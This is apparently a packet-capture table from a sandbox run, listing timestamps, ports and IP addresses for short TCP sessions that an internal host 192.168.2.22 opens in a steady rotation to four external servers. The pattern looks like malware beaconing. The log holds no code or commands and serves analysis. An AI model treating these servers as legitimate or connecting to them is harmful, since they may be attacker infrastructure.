Jan 12, 2021 07:40:50.468214989 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.511326075 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.526520014 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.526565075 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.526612043 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.526659966 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.542141914 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.587793112 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.587889910 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.594475985 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.594717979 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.637794018 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.637957096 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.677876949 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.681019068 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.681097984 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.793735981 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.793761015 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.793875933 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.797142029 CET	49271	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:50.840270996 CET	3308	49271	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:50.912199020 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:50.965998888 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:50.966089010 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:50.967256069 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.021517038 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.054205894 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.054234982 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.054425001 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.060673952 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.121159077 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.121249914 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.127130985 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.127269030 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.181905031 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.182148933 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.221338034 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.235781908 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.235809088 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.325687885 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.325711966 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.325890064 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.331115961 CET	49272	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:51.384963036 CET	3389	49272	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:51.468732119 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.521878958 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.522020102 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.522923946 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.575841904 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.582663059 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.582691908 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.582869053 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.592315912 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.646488905 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.646794081 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.655894995 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.656284094 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.709192991 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.709440947 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.762434959 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.865698099 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.865725040 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.865885019 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.869448900 CET	49273	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:51.922346115 CET	1512	49273	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:51.982513905 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.034137964 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.034286976 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.035234928 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.086880922 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.101597071 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.101721048 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.114880085 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.169137001 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.169347048 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.174938917 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.175127983 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.226696014 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.226989031 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.278837919 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.278887987 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.397056103 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.397082090 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.397264957 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.400646925 CET	49274	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:52.452105999 CET	443	49274	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:52.514906883 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.558198929 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.558413982 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.559703112 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.602845907 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.613841057 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.613897085 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.614130974 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.629100084 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.674072981 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.674221039 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.679861069 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.680119038 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.723159075 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.723310947 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.762346029 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.766419888 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.766464949 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.878902912 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.878927946 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:52.879004002 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.882040977 CET	49275	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:52.925199986 CET	3308	49275	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:53.013042927 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.067471981 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.067575932 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.068540096 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.122941971 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.144172907 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.144226074 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.144392014 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.153920889 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.218749046 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.219070911 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.225126982 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.225280046 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.278955936 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.279165983 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.318110943 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.332766056 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.332798958 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.423466921 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.423502922 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.423713923 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.426691055 CET	49276	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:53.480303049 CET	3389	49276	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:53.545583963 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.598442078 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.598601103 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.599646091 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.652460098 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.659585953 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.659626961 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.659816027 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.668811083 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.723166943 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.723536015 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.734015942 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.734519958 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.787406921 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.787688017 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.825077057 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.840544939 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.840573072 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.937664032 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.937695026 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:53.937906981 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.941044092 CET	49277	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:53.993992090 CET	1512	49277	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:54.057375908 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.109726906 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.109929085 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.110706091 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.162918091 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.177886009 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.178008080 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.188970089 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.244183064 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.244453907 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.250631094 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.250844955 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.302911043 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.303438902 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.342843056 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.355688095 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.474535942 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.474575043 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.474787951 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.477924109 CET	49278	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:54.530144930 CET	443	49278	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:54.588715076 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.632005930 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.632200003 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.635037899 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.678210974 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.688967943 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.688999891 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.689085960 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.701986074 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.746887922 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.747112989 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.753076077 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.753310919 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.796299934 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.796495914 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.835887909 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.839854002 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.839898109 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.952908039 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.952940941 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:54.953154087 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:54.957047939 CET	49279	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:55.000181913 CET	3308	49279	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:55.073036909 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.127300024 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.127370119 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.128388882 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.182362080 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.201922894 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.201952934 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.202014923 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.202054024 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.212075949 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.271532059 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.271605015 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.277764082 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.277920961 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.331783056 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.331865072 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.371303082 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.386018038 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.386046886 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.474841118 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.474865913 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.474903107 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.474927902 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.477220058 CET	49280	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:55.531255007 CET	3389	49280	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:55.588088989 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.641026020 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.641230106 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.642214060 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.694983006 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.701725006 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.701760054 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.701827049 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.715087891 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.769117117 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.769197941 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.775100946 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.775259018 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.828068972 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.828156948 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.864918947 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.880958080 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.984428883 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.984452963 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:55.984515905 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:55.987622023 CET	49281	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:56.041232109 CET	1512	49281	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:56.101211071 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.153326988 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.153399944 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.154442072 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.206404924 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.221548080 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.221671104 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.232928991 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.287391901 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.290035009 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.293977022 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.294966936 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.346986055 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.347357988 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.399333000 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.520147085 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.520169973 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.523308992 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.523361921 CET	49282	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:56.577292919 CET	443	49282	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:56.652724028 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.695822001 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:56.696753025 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.697082043 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.740044117 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:56.751570940 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:56.751619101 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:56.751703978 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.751728058 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.764911890 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.809849977 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:56.810004950 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.816073895 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.816114902 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.859419107 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:56.859540939 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:56.899956942 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:56.902622938 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:56.902641058 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:57.016155005 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:57.016184092 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:57.016311884 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:57.016336918 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:57.019969940 CET	49283	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:57.063079119 CET	3308	49283	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:57.132250071 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.186067104 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.186850071 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.187342882 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.240961075 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.255002022 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.255027056 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.255089998 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.264678001 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.337146044 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.337315083 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.347570896 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.347723007 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.401227951 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.401299000 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.440466881 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.454890013 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.454914093 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.545286894 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.545315027 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.545392990 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.548844099 CET	49284	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:57.602245092 CET	3389	49284	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:57.664187908 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.717268944 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:57.717354059 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.718290091 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.770987034 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:57.777851105 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:57.777870893 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:57.777904034 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.777935028 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.787316084 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.841284990 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:57.841404915 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.846100092 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.846271992 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.876199007 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:40:57.898969889 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:57.899147034 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:57.937093019 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:57.952117920 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:58.052998066 CET	1512	49285	46.105.131.65	192.168.2.22
